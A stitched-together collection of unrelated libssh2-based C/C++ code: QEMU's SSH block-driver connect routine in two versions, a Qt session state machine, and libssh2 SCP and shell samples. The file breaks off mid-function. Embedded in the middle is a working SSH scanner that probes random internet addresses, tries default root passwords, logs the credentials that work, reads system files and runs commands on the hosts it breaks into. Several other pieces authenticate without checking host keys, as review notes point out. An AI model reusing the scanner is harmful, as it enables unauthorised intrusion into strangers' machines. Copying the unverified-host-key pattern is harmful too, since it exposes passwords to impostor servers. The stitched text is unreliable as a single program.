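 * "user" (default: current user name), "host_key_check" (default "yes").
 * The options are deleted from the dictionary only after everything
 * succeeded.
 *
 * Returns 0 on success. On failure returns a negative errno value, sets
 * *errp and releases the SFTP handle, the SFTP session and the SSH session.
 * The socket in s->sock is not closed here.
 */
static int connect_to_ssh(BDRVSSHState *s, QDict *options,
                          int ssh_flags, int creat_mode, Error **errp)
{
    int r, ret;
    const char *host, *user, *path, *host_key_check;
    int port;

    if (!qdict_haskey(options, "host")) {
        ret = -EINVAL;
        error_setg(errp, "No hostname was specified");
        goto err;
    }
    host = qdict_get_str(options, "host");

    if (qdict_haskey(options, "port")) {
        port = qdict_get_int(options, "port");
    } else {
        port = 22;
    }

    if (!qdict_haskey(options, "path")) {
        ret = -EINVAL;
        error_setg(errp, "No path was specified");
        goto err;
    }
    path = qdict_get_str(options, "path");

    if (qdict_haskey(options, "user")) {
        user = qdict_get_str(options, "user");
    } else {
        user = g_get_user_name();
        if (!user) {
            /* Capture errno before the error call can overwrite it. */
            ret = -errno;
            error_setg_errno(errp, -ret, "Can't get user name");
            goto err;
        }
    }

    if (qdict_haskey(options, "host_key_check")) {
        host_key_check = qdict_get_str(options, "host_key_check");
    } else {
        host_key_check = "yes";
    }

    /* Construct the host:port name for inet_connect. */
    g_free(s->hostport);
    s->hostport = g_strdup_printf("%s:%d", host, port);

    /* Open the socket and connect. */
    s->sock = inet_connect(s->hostport, errp);
    if (s->sock < 0) {
        ret = -errno;
        goto err;
    }

    /* Create SSH session. */
    s->session = libssh2_session_init();
    if (!s->session) {
        ret = -EINVAL;
        session_error_setg(errp, s, "failed to initialize libssh2 session");
        goto err;
    }

#if TRACE_LIBSSH2 != 0
    libssh2_trace(s->session, TRACE_LIBSSH2);
#endif

    r = libssh2_session_handshake(s->session, s->sock);
    if (r != 0) {
        ret = -EINVAL;
        session_error_setg(errp, s, "failed to establish SSH session");
        goto err;
    }

    /* Check the remote host's key against known_hosts. This runs before
     * authenticate() so no credential reaches an unverified server. */
    ret = check_host_key(s, host, port, host_key_check, errp);
    if (ret < 0) {
        goto err;
    }

    /* Authenticate. */
    ret = authenticate(s, user, errp);
    if (ret < 0) {
        goto err;
    }

    /* Start SFTP. */
    s->sftp = libssh2_sftp_init(s->session);
    if (!s->sftp) {
        session_error_setg(errp, s, "failed to initialize sftp handle");
        ret = -EINVAL;
        goto err;
    }

    /* Open the remote file. */
    DPRINTF("opening file %s flags=0x%x creat_mode=0%o",
            path, ssh_flags, creat_mode);
    s->sftp_handle = libssh2_sftp_open(s->sftp, path, ssh_flags, creat_mode);
    if (!s->sftp_handle) {
        session_error_setg(errp, s, "failed to open remote file '%s'", path);
        ret = -EINVAL;
        goto err;
    }

    r = libssh2_sftp_fstat(s->sftp_handle, &s->attrs);
    if (r < 0) {
        sftp_error_setg(errp, s, "failed to read file attributes");
        /* This path used to return directly and leave the handle, the SFTP
         * session and the SSH session open. */
        ret = -EINVAL;
        goto err;
    }

    /* Delete the options we've used; any not deleted will cause the
     * block layer to give an error about unused options.
     */
    qdict_del(options, "host");
    qdict_del(options, "port");
    qdict_del(options, "user");
    qdict_del(options, "path");
    qdict_del(options, "host_key_check");

    return 0;

 err:
    if (s->sftp_handle) {
        libssh2_sftp_close(s->sftp_handle);
    }
    s->sftp_handle = NULL;
    if (s->sftp) {
        libssh2_sftp_shutdown(s->sftp);
    }
    s->sftp = NULL;
    if (s->session) {
        libssh2_session_disconnect(s->session,
                                   "from qemu ssh client: "
                                   "error opening connection");
        libssh2_session_free(s->session);
    }
    s->session = NULL;

    return ret;
}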
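// Advance the session-opening state machine by one step and return the new
// state. Call repeatedly until the state is SESSION_OPEN or
// SESSION_OPEN_ERROR.
//
// Steps: non-blocking connect() -> select() on the socket -> create the
// libssh2 session -> handshake -> password authentication. Steps that would
// block keep the current state so the next call retries them.
//
// NOTE(review): the host key is never compared with a stored value (the
// fingerprint code below was commented out), so the password is sent to an
// unverified server.
SSH_SESSION_STATE SSHSession::begin_session(){

    /////////////////////////////////////////////
    //Perform the connect call
    if(this->state == ::SESSION_PERFORM_CONNECT || this->state == ::SESSION_CLOSED){
        int ret = ::connect(this->sock, (struct sockaddr*)(&this->addr), sizeof(struct sockaddr_in));
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
        int ec = WSAGetLastError();
        if(ret == SOCKET_ERROR && ec == WSAEWOULDBLOCK) {
            this->state = ::SESSION_SELECT_SOCKET;
        }
#else
        if(ret == -1 && errno == EINPROGRESS) {
            this->state = ::SESSION_SELECT_SOCKET;
        }
#endif
        //Success (will most likely never happen) ?
        else if(ret == 0){
            this->state = ::SESSION_PERFORM_INIT;
        //Major error
        } else{
            this->running_procs--;
            this->state = ::SESSION_OPEN_ERROR;
        }

    /////////////////////////////////////////////
    //Poll the socket after connect()
    }else if(this->state == ::SESSION_SELECT_SOCKET){
        fd_set fd_write, fd_error;
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
        TIMEVAL timeout;
#else
        struct timeval timeout;
#endif
        // timeout after 10 seconds
        int timeoutSec = 10;

        FD_ZERO(&fd_write);
        FD_ZERO(&fd_error);
        FD_SET(this->sock, &fd_write);
        FD_SET(this->sock, &fd_error);

        timeout.tv_sec = timeoutSec;
        timeout.tv_usec = 0;

#if defined( WIN32 ) || defined( _WIN32 ) || defined( __WIN32 ) && !defined( __CYGWIN__ )
        int ret = select( 0, NULL, &fd_write, &fd_error, &timeout );
#else
        int ret = select( this->sock + 1, NULL, &fd_write, &fd_error, &timeout );
#endif
        //Timed out ?
        if(ret == 0) {
            this->state = ::SESSION_OPEN_ERROR;
        }else{
            //socket data ?
            if(FD_ISSET(this->sock, &fd_write)) {
                this->state = ::SESSION_PERFORM_INIT;
                fprintf(stderr, "connect done..\n");
            }
            //socket error
            else if(FD_ISSET(this->sock, &fd_error)) {
                this->state = ::SESSION_OPEN_ERROR;
                this->running_procs--;
                fprintf(stderr, "connect error..\n");
            //Continue polling next pass
            }else{
                this->state = ::SESSION_SELECT_SOCKET;
            }
        }

    /////////////////////////////////////////////
    //Initialize the libssh2 session object
    }else if(this->state == ::SESSION_PERFORM_INIT){
        //Create a session instance
        this->session = libssh2_session_init();
        if(!this->session){
            // The error state used to be overwritten below, and the NULL
            // session was passed on to libssh2.
            // NOTE(review): the other error paths also decrement
            // running_procs; confirm whether this one should.
            this->state = ::SESSION_OPEN_ERROR;
        }else{
            //Notify libssh2 we are non-blocking
            libssh2_session_set_blocking(this->session, 0);

            //Move on to the next step
            this->state = ::SESSION_PERFORM_HANDSHAKE;
        }

    /////////////////////////////////////////////////////////////////////////////
    //Exchange welcome banners,keys and setup crypto, compression, and MAC layers
    }else if(this->state == ::SESSION_PERFORM_HANDSHAKE){
        rc = libssh2_session_handshake(this->session, this->sock);

        //Blocking ?
        if(rc == LIBSSH2_ERROR_EAGAIN){
            this->state = ::SESSION_PERFORM_HANDSHAKE;

        //Failure?
        }else if(rc){
            this->state = ::SESSION_OPEN_ERROR;
            this->running_procs--;
        }
        //success ?
        else if(rc == 0) {
            this->state = ::SESSION_PERFORM_AUTH;

            //TODO: check the host key's fingerprint against a known/stored
            //fingerprint here, before moving on to authentication
        }

    //////////////////////////
    //Perform authentication
    } else if(this->state == ::SESSION_PERFORM_AUTH){
        //Authenticate via password
        rc = libssh2_userauth_password(this->session, this->username.toUtf8().constData(), this->password.toUtf8().constData()) ;

        //blocking
        if(rc == LIBSSH2_ERROR_EAGAIN){
            this->state = ::SESSION_PERFORM_AUTH;
        }
        //failure?
        else if(rc){
            this->state = ::SESSION_OPEN_ERROR;
            this->running_procs--;
            qDebug() << "auth failed..\n";
        //success ?
        }else if(rc == 0){
            this->state = ::SESSION_OPEN;
            qDebug() << "auth done..\n";
            this->running_procs--;
            qDebug() << this->running_procs;
        }
    }
    return this->state;
}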
void* thread_func(void* arg) { int sockfd; sockaddr_in serv_addr; char curhost[26]; boost::random::uniform_int_distribution<> dist(1, 9999999999999);//numeric_limits< unsigned long>::max()); boost::random::mt19937 gen((int)pthread_self()+(int)time(NULL)); LIBSSH2_SESSION *session=0; // HCkSsh ssh; srand((int)pthread_self()+rand()+time(NULL)); while (do_scan) { sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) deb("ERROR opening socket: %s\r\n",fmterr()); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)); long flags; flags = fcntl(sockfd, F_GETFL, 0); fcntl(sockfd, F_SETFL, flags | O_NONBLOCK); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(22); do { serv_addr.sin_addr.s_addr = dist(gen);//getrnd(0,100000000000000);//rand();//inet_addr("195.2.253.204") } while (ischecking(serv_addr.sin_addr.s_addr)); strncpy(curhost, inet_ntoa(serv_addr.sin_addr), sizeof(curhost)); addchecking(serv_addr.sin_addr.s_addr); unsigned long chkdist=0; chkdist=dist(gen); int ret; // deb("\rconnecting %16s ", inet_ntoa(serv_addr.sin_addr)); ret=connect(sockfd, (struct sockaddr*) &serv_addr, sizeof( serv_addr)); fd_set fds; //deb("ret:%d errno:%s (%d)\r\n",ret,strerror(errno),errno); // sleep(1); FD_ZERO(&fds); FD_SET(sockfd, &fds); tv.tv_sec = 2; tv.tv_usec = 0; char buf[1024]; if (ret==0 || (ret==-1 && errno == EINPROGRESS)) { ipscanned++; int res = select(sockfd+1, &fds,&fds, 0, &tv); //deb("res:%d errno:%s (%d)\r\n",res,strerror(errno),errno); if (res < 0 && errno != EINTR) { // deb("\r\n%s Error connecting %d - %s\n\r", // curhost, errno, strerror(errno)); } else if (res > 0) { flags &= (~O_NONBLOCK); if ( fcntl(sockfd, F_SETFL, flags) < 0) { deb("Error fcntl(..., F_SETFL) (%s)\n", strerror(errno)); } int rcv; memset(buf, 0, sizeof(buf)); rcv = recv(sockfd, buf, sizeof(buf), MSG_PEEK); //if (rcv>0) // buf[rcv]=0; // if (rcv>0) // deb("rcv: %d %s\r\n",rcv, trim(buf)); const char *username="******"; const 
char *password="******"; const char *sftppath="/tmp"; int rc; const char *fingerprint; session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); int numTry=0; while (session>0 && (rc = libssh2_session_handshake(session, sockfd)) == LIBSSH2_ERROR_EAGAIN); int u; LIBSSH2_CHANNEL *channel=0; if (rc) { if (rc!=-43) deb("%16s failure establishing SSH session: %d [rnd: %lu, checking: %d]\n", curhost,rc,chkdist,checking.size()); //return -1; } else { totscanned++; fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); deb( "%16s %-50s ", inet_ntoa(serv_addr.sin_addr), trim(buf)); for (int i = 0; i < 20; i++) { deb(KYEL "%02X " RESET, (unsigned char)fingerprint[i]); } deb( "\n"); char* passwords[]={"root","admin","toor","r00t","adm", "secure","pwd","password","god" }; for ( u=0;u<3;u++) { if (libssh2_userauth_password(session, username, passwords[u])) { // deb( "%16s " KRED "Authentication by password failed. [%s]\n" // RESET, inet_ntoa(serv_addr.sin_addr),passwords[u]); continue; } else { deb(KCYN "%16s authenticated %s:%s \r\n" RESET, inet_ntoa(serv_addr.sin_addr), username,passwords[u],totscanned); struct stat fileinfo; channel = libssh2_scp_recv(session, "/etc/services", &fileinfo); if (!channel) { deb(KRED "%16s Unable to open a session: %d\r\n" RESET, inet_ntoa(serv_addr.sin_addr), libssh2_session_last_errno(session)); break; } if (!fileinfo.st_size) { deb(KGRN "%16s router/modem\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size); fdeb("%s %s:%s [router/modem (%s)]\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim(buf)); } else { deb(KGRN "%16s unknown device fs:%d [%s]\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size,trim(buf)); fdeb("%s %s:%s unknown (%s)\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim( buf)); } channel = libssh2_scp_recv(session, "/proc/cpuinfo", &fileinfo); if (!channel) { // deb(KRED "\r\nUnable to open a session: %d\r\n" RESET, // 
libssh2_session_last_errno(session)); //break; } else { int got=0; char mem[1024]; int amount=sizeof(mem); while (got < fileinfo.st_size) { if ((fileinfo.st_size -got) < amount) { amount = fileinfo.st_size -got; } rc = libssh2_channel_read(channel, mem, amount); if (rc > 0) { deb("mem:%p rc:%d", mem, rc); } else if (rc < 0) { deb("libssh2_channel_read() failed: %d\n", rc); break; } got += rc; } if (mem[0]) deb("mem: %s", mem); } founds++; try { MySexec sexec; sexec.SetSSHHost( curhost ); int ret_code = sexec.SetTimeout(17); if (ret_code) throw("\r\nfailed: SetTimeout\r\n"); ret_code = sexec.SetSSHUser(username); if (ret_code) throw("\r\nfailed: SetSSHUser\r\n"); ret_code = sexec.SetSSHPassword(passwords[u]); if (ret_code) throw("\r\nfailed: SetSSHPassword()\r\n"); ret_code = sexec.SSHLogon(curhost ,22); if (ret_code) throw("\r\nfailed: SSHLogon\r\n"); ret_code = sexec.Execute("ls -l"); if (ret_code) throw("\r\Execute:%d",ret_code); //sleep(2); deb(KGRN "executed on %s\r\n" RESET, curhost); // fdeb("\r\n[host %s]\r\n",curhost); // exit(0); } catch ( const char *str ) { deb(KRED "in except: %s\r\n" RESET,str); } //exit(0); } } // free(fingerprint); } if (channel) libssh2_channel_free(channel); if (session) { // libssh2_session_disconnect(session, "Norm"); libssh2_session_free(session); } /* ssh = CkSsh_Create(); bool success; CkSsh_UnlockComponent(ssh,"Anything for 30-day trial"); success = CkSsh_Connect(ssh,inet_ntoa(serv_addr.sin_addr),22); CkSsh_putIdleTimeoutMs(ssh,5000); success = CkSsh_AuthenticatePw(ssh,"root","root"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } int channelNum; channelNum = CkSsh_OpenSessionChannel(ssh); if (channelNum < 0) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } success = CkSsh_SendReqExec(ssh,channelNum,"uname -a"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Call ChannelReceiveToClose to read // output until the server's corresponding "channel close" is received. 
success = CkSsh_ChannelReceiveToClose(ssh,channelNum); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Let's pickup the accumulated output of the command: const char * cmdOutput; cmdOutput = CkSsh_getReceivedText(ssh,channelNum,"ansi"); if (cmdOutput == 0 ) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Display the remote shell's command output: deb("%s\n",cmdOutput); // Disconnect CkSsh_Disconnect(ssh); CkSsh_Dispose(ssh);*/ } }
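/*
 * Sample program: upload one local file to a remote host over SCP (libssh2).
 *
 * Positional arguments (all optional): IPv4 address, user name, password,
 * local file, remote path. Defaults: 127.0.0.1, the built-in credentials,
 * "scp_write.c" and "/tmp/TEST".
 *
 * Returns 1 if libssh2 cannot be initialised, -1 on the other setup
 * failures (local file, address, socket, connect, session, handshake,
 * host key hash) and 0 once the normal shutdown path has run.
 *
 * NOTE(review): a password passed as argv[3] is visible to other local
 * users through the process list; prefer a prompt, a protected file or
 * key-based authentication.
 */
int main(int argc, char *argv[])
{
    unsigned long hostaddr;
    int sock = -1, i, auth_pw = 1;
    int exitcode = 0;
    struct sockaddr_in sin = {0};
    const char *fingerprint;
    LIBSSH2_SESSION *session = NULL;
    LIBSSH2_CHANNEL *channel = NULL;
    const char *username="******";
    const char *password="******";
    const char *loclfile="scp_write.c";
    const char *scppath="/tmp/TEST";
    FILE *local = NULL;
    int rc;
    char mem[1024];
    size_t nread;
    char *ptr;
    struct stat fileinfo;

#ifdef WIN32
    WSADATA wsadata;

    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

    if (argc > 1) {
        hostaddr = inet_addr(argv[1]);
    } else {
        hostaddr = htonl(0x7F000001);
    }

    if (argc > 2) {
        username = argv[2];
    }
    if (argc > 3) {
        password = argv[3];
    }
    if(argc > 4) {
        loclfile = argv[4];
    }
    if (argc > 5) {
        scppath = argv[5];
    }

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return 1;
    }

    /* inet_addr() reports an unparsable address as INADDR_NONE. */
    if (hostaddr == INADDR_NONE) {
        fprintf(stderr, "invalid IPv4 address\n");
        exitcode = -1;
        goto shutdown;
    }

    local = fopen(loclfile, "rb");
    if (!local) {
        fprintf(stderr, "Can't open local file %s\n", loclfile);
        exitcode = -1;
        goto shutdown;
    }

    /* The size and mode sent to the server come from fileinfo, so a failed
     * stat() must not be ignored: the struct would be uninitialised. */
    if (stat(loclfile, &fileinfo) != 0) {
        fprintf(stderr, "Can't stat local file %s\n", loclfile);
        exitcode = -1;
        goto shutdown;
    }

    /* Ultra basic "connect to port 22 on localhost"
     * Your code is responsible for creating the socket establishing the
     * connection
     */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if(-1 == sock) {
        fprintf(stderr, "failed to create socket!\n");
        exitcode = -1;
        goto shutdown;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        exitcode = -1;
        goto shutdown;
    }

    /* Create a session instance */
    session = libssh2_session_init();
    if(!session) {
        exitcode = -1;
        goto shutdown;
    }

    /* ... start it up. This will trade welcome banners, exchange keys,
     * and setup crypto, compression, and MAC layers
     */
    rc = libssh2_session_handshake(session, sock);
    if(rc) {
        fprintf(stderr, "Failure establishing SSH session: %d\n", rc);
        /* No usable transport: free the session without a disconnect. */
        libssh2_session_free(session);
        session = NULL;
        exitcode = -1;
        goto shutdown;
    }

    /* At this point we haven't yet authenticated. The first thing to do
     * is check the hostkey's fingerprint against our known hosts. Your app
     * may have it hard coded, may go to a file, may present it to the
     * user, that's your call.
     *
     * NOTE(review): this sample only prints the fingerprint. Nothing
     * compares it with a pinned value or a known_hosts entry, so the
     * password below is sent to whichever server answered. Real code
     * should verify the key (for example with the libssh2_knownhost_*
     * functions) and stop on a mismatch before authenticating.
     */
    fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
    if (!fingerprint) {
        fprintf(stderr, "Unable to obtain the host key hash\n");
        exitcode = -1;
        goto shutdown;
    }
    fprintf(stderr, "Fingerprint: ");
    for(i = 0; i < 20; i++) {   /* a SHA-1 digest is 20 bytes */
        fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]);
    }
    fprintf(stderr, "\n");

    if (auth_pw) {
        /* We could authenticate via password */
        if (libssh2_userauth_password(session, username, password)) {
            fprintf(stderr, "Authentication by password failed.\n");
            goto shutdown;
        }
    } else {
        /* Or by public key */
        if (libssh2_userauth_publickey_fromfile(session, username,
                            "/home/username/.ssh/id_rsa.pub",
                            "/home/username/.ssh/id_rsa",
                            password)) {
            fprintf(stderr, "\tAuthentication by public key failed\n");
            goto shutdown;
        }
    }

    /* Send a file via scp. The mode parameter must only have permissions! */
    channel = libssh2_scp_send(session, scppath, fileinfo.st_mode & 0777,
                               (unsigned long)fileinfo.st_size);

    if (!channel) {
        char *errmsg;
        int errlen;
        int err = libssh2_session_last_error(session, &errmsg, &errlen, 0);
        fprintf(stderr, "Unable to open a session: (%d) %s\n", err, errmsg);
        goto shutdown;
    }

    fprintf(stderr, "SCP session waiting to send file\n");
    for (;;) {
        nread = fread(mem, 1, sizeof(mem), local);
        if (nread == 0) {
            /* end of file (or read error); size_t cannot be negative */
            break;
        }
        ptr = mem;

        while (nread) {
            /* keep writing the remainder until error or completion */
            rc = libssh2_channel_write(channel, ptr, nread);
            if (rc < 0) {
                /* Stop the whole transfer: carrying on with the next
                 * chunk would leave a hole in the remote file. */
                fprintf(stderr, "ERROR %d\n", rc);
                goto close_channel;
            }
            /* rc indicates how many bytes were written this time */
            ptr += rc;
            nread -= rc;
        }
    }

    fprintf(stderr, "Sending EOF\n");
    libssh2_channel_send_eof(channel);

    fprintf(stderr, "Waiting for EOF\n");
    libssh2_channel_wait_eof(channel);

    fprintf(stderr, "Waiting for channel to close\n");
    libssh2_channel_wait_closed(channel);

 close_channel:
    libssh2_channel_free(channel);
    channel = NULL;

 shutdown:
    if(session) {
        libssh2_session_disconnect(session, "Normal Shutdown, Thank you for playing");
        libssh2_session_free(session);
    }
    if (sock != -1) {
#ifdef WIN32
        closesocket(sock);
#else
        close(sock);
#endif
    }
    if (local)
        fclose(local);
    fprintf(stderr, "all done\n");

    libssh2_exit();

    return exitcode;
}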
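/*
 * Sample program: connect to an SSH server, authenticate with one of the
 * methods the server offers, and request a pty and a shell.
 *
 * Positional arguments (all optional): IPv4 address, user name, password,
 * and a method switch ("-p" password, "-i" keyboard-interactive,
 * "-k" public key). username, password, keyfile1, keyfile2 and
 * kbd_callback are defined elsewhere in this file.
 *
 * Returns 1 if WSAStartup or libssh2 initialisation fails, -1 on socket,
 * connect, session, handshake or host key hash failures, and 0 once the
 * shutdown path has run.
 */
int main(int argc, char *argv[])
{
    unsigned long hostaddr;
    int rc, sock = -1, i, auth_pw = 0;
    int exitcode = 0;
    struct sockaddr_in sin = {0};
    const char *fingerprint;
    char *userauthlist;
    LIBSSH2_SESSION *session = NULL;
    LIBSSH2_CHANNEL *channel = NULL;

#ifdef WIN32
    WSADATA wsadata;
    int err;

    err = WSAStartup(MAKEWORD(2,0), &wsadata);
    if (err != 0) {
        fprintf(stderr, "WSAStartup failed with error: %d\n", err);
        return 1;
    }
#endif

    if (argc > 1) {
        hostaddr = inet_addr(argv[1]);
    } else {
        hostaddr = htonl(0x7F000001);
    }

    if(argc > 2) {
        username = argv[2];
    }
    if(argc > 3) {
        /* NOTE(review): a password on the command line is visible to other
         * local users through the process list. */
        password = argv[3];
    }

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return 1;
    }

    /* Ultra basic "connect to port 22 on localhost". Your code is
     * responsible for creating the socket establishing the connection
     */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        fprintf(stderr, "failed to create socket!\n");
        exitcode = -1;
        goto shutdown;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        exitcode = -1;
        goto shutdown;
    }

    /* Create a session instance and start it up. This will trade welcome
     * banners, exchange keys, and setup crypto, compression, and MAC layers
     */
    session = libssh2_session_init();
    if (!session) {
        fprintf(stderr, "Failure establishing SSH session\n");
        exitcode = -1;
        goto shutdown;
    }
    if (libssh2_session_handshake(session, sock)) {
        fprintf(stderr, "Failure establishing SSH session\n");
        /* No usable transport: free the session without a disconnect. */
        libssh2_session_free(session);
        session = NULL;
        exitcode = -1;
        goto shutdown;
    }

    /* At this point we haven't authenticated. The first thing to do is check
     * the hostkey's fingerprint against our known hosts. Your app may have it
     * hard coded, may go to a file, may present it to the user, that's your
     * call.
     *
     * NOTE(review): this sample only prints the fingerprint; nothing compares
     * it with a trusted value, so the credentials below go to whichever
     * server answered. Real code should verify the key and stop on a
     * mismatch before authenticating.
     */
    fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
    if (!fingerprint) {
        fprintf(stderr, "Unable to obtain the host key hash\n");
        exitcode = -1;
        goto shutdown;
    }
    fprintf(stderr, "Fingerprint: ");
    for(i = 0; i < 20; i++) {   /* a SHA-1 digest is 20 bytes */
        fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]);
    }
    fprintf(stderr, "\n");

    /* check what authentication methods are available */
    userauthlist = libssh2_userauth_list(session, username, strlen(username));
    if (!userauthlist) {
        /* strstr() on a NULL list would crash; treat it as "nothing
         * offered" and shut down cleanly. */
        fprintf(stderr, "No supported authentication methods found!\n");
        goto shutdown;
    }
    fprintf(stderr, "Authentication methods: %s\n", userauthlist);
    if (strstr(userauthlist, "password") != NULL) {
        auth_pw |= 1;
    }
    if (strstr(userauthlist, "keyboard-interactive") != NULL) {
        auth_pw |= 2;
    }
    if (strstr(userauthlist, "publickey") != NULL) {
        auth_pw |= 4;
    }

    /* if we got a 4th argument we set this option if supported */
    if(argc > 4) {
        if ((auth_pw & 1) && !strcasecmp(argv[4], "-p")) {
            auth_pw = 1;
        }
        if ((auth_pw & 2) && !strcasecmp(argv[4], "-i")) {
            auth_pw = 2;
        }
        if ((auth_pw & 4) && !strcasecmp(argv[4], "-k")) {
            auth_pw = 4;
        }
    }

    if (auth_pw & 1) {
        /* We could authenticate via password */
        if (libssh2_userauth_password(session, username, password)) {
            fprintf(stderr, "\tAuthentication by password failed!\n");
            goto shutdown;
        } else {
            fprintf(stderr, "\tAuthentication by password succeeded.\n");
        }
    } else if (auth_pw & 2) {
        /* Or via keyboard-interactive */
        if (libssh2_userauth_keyboard_interactive(session, username,
                                                  &kbd_callback) ) {
            fprintf(stderr,
                "\tAuthentication by keyboard-interactive failed!\n");
            goto shutdown;
        } else {
            fprintf(stderr,
                "\tAuthentication by keyboard-interactive succeeded.\n");
        }
    } else if (auth_pw & 4) {
        /* Or by public key */
        if (libssh2_userauth_publickey_fromfile(session, username, keyfile1,
                                                keyfile2, password)) {
            fprintf(stderr, "\tAuthentication by public key failed!\n");
            goto shutdown;
        } else {
            fprintf(stderr, "\tAuthentication by public key succeeded.\n");
        }
    } else {
        fprintf(stderr, "No supported authentication methods found!\n");
        goto shutdown;
    }

    /* Request a shell */
    if (!(channel = libssh2_channel_open_session(session))) {
        fprintf(stderr, "Unable to open a session\n");
        goto shutdown;
    }

    /* Some environment variables may be set,
     * It's up to the server which ones it'll allow though
     */
    libssh2_channel_setenv(channel, "FOO", "bar");

    /* Request a terminal with 'vanilla' terminal emulation
     * See /etc/termcap for more options
     */
    if (libssh2_channel_request_pty(channel, "vanilla")) {
        fprintf(stderr, "Failed requesting pty\n");
        goto skip_shell;
    }

    /* Open a SHELL on that pty */
    if (libssh2_channel_shell(channel)) {
        fprintf(stderr, "Unable to request shell on allocated pty\n");
        /* Go through skip_shell so the channel is freed before shutdown. */
        goto skip_shell;
    }

    /* At this point the shell can be interacted with using
     * libssh2_channel_read()
     * libssh2_channel_read_stderr()
     * libssh2_channel_write()
     * libssh2_channel_write_stderr()
     *
     * Blocking mode may be (en|dis)abled with: libssh2_channel_set_blocking()
     * If the server send EOF, libssh2_channel_eof() will return non-0
     * To send EOF to the server use: libssh2_channel_send_eof()
     * A channel can be closed with: libssh2_channel_close()
     * A channel can be freed with: libssh2_channel_free()
     */

  skip_shell:
    if (channel) {
        libssh2_channel_free(channel);
        channel = NULL;
    }

    /* Other channel types are supported via:
     * libssh2_scp_send()
     * libssh2_scp_recv()
     * libssh2_channel_direct_tcpip()
     */

  shutdown:
    if (session) {
        libssh2_session_disconnect(session,
                                   "Normal Shutdown, Thank you for playing");
        libssh2_session_free(session);
    }

    if (sock != -1) {
#ifdef WIN32
        closesocket(sock);
#else
        close(sock);
#endif
    }
    fprintf(stderr, "all done!\n");

    libssh2_exit();

    return exitcode;
}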
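/*
 * Open an SSH connection described by @options and open the remote file
 * over SFTP, storing socket, session, SFTP and file handles in @s.
 *
 * @s:          driver state to fill in
 * @options:    runtime options; "path" is required, "user" defaults to the
 *              local user name, "host_key_check" defaults to "yes"
 * @ssh_flags:  flags passed to libssh2_sftp_open()
 * @creat_mode: creation mode passed to libssh2_sftp_open()
 * @errp:       receives a description of the failure
 *
 * Returns 0 on success, a negative errno value on failure. On failure the
 * SFTP handle, SFTP session and SSH session are released and their fields
 * in @s reset to NULL.
 *
 * NOTE(review): the error path does not close s->sock; presumably the
 * caller does -- verify against the callers.
 */
static int connect_to_ssh(BDRVSSHState *s, QDict *options,
                          int ssh_flags, int creat_mode, Error **errp)
{
    int r, ret;
    QemuOpts *opts = NULL;
    Error *local_err = NULL;
    const char *user, *path, *host_key_check;
    long port = 0;

    opts = qemu_opts_create(&ssh_runtime_opts, NULL, 0, &error_abort);
    qemu_opts_absorb_qdict(opts, options, &local_err);
    if (local_err) {
        ret = -EINVAL;
        error_propagate(errp, local_err);
        goto err;
    }

    if (!ssh_process_legacy_socket_options(options, opts, errp)) {
        ret = -EINVAL;
        goto err;
    }

    path = qemu_opt_get(opts, "path");
    if (!path) {
        ret = -EINVAL;
        error_setg(errp, "No path was specified");
        goto err;
    }

    user = qemu_opt_get(opts, "user");
    if (!user) {
        user = g_get_user_name();
        if (!user) {
            error_setg_errno(errp, errno, "Can't get user name");
            ret = -errno;
            goto err;
        }
    }

    /* Host key checking is on unless the caller explicitly chooses
     * another mode. */
    host_key_check = qemu_opt_get(opts, "host_key_check");
    if (!host_key_check) {
        host_key_check = "yes";
    }

    /* Pop the config into our state object, Exit if invalid */
    s->inet = ssh_config(s, options, errp);
    if (!s->inet) {
        ret = -EINVAL;
        goto err;
    }

    if (qemu_strtol(s->inet->port, NULL, 10, &port) < 0) {
        error_setg(errp, "Use only numeric port value");
        ret = -EINVAL;
        goto err;
    }

    /* Open the socket and connect. */
    s->sock = inet_connect_saddr(s->inet, errp, NULL, NULL);
    if (s->sock < 0) {
        ret = -EIO;
        goto err;
    }

    /* Create SSH session. */
    s->session = libssh2_session_init();
    if (!s->session) {
        ret = -EINVAL;
        session_error_setg(errp, s, "failed to initialize libssh2 session");
        goto err;
    }

#if TRACE_LIBSSH2 != 0
    libssh2_trace(s->session, TRACE_LIBSSH2);
#endif

    r = libssh2_session_handshake(s->session, s->sock);
    if (r != 0) {
        ret = -EINVAL;
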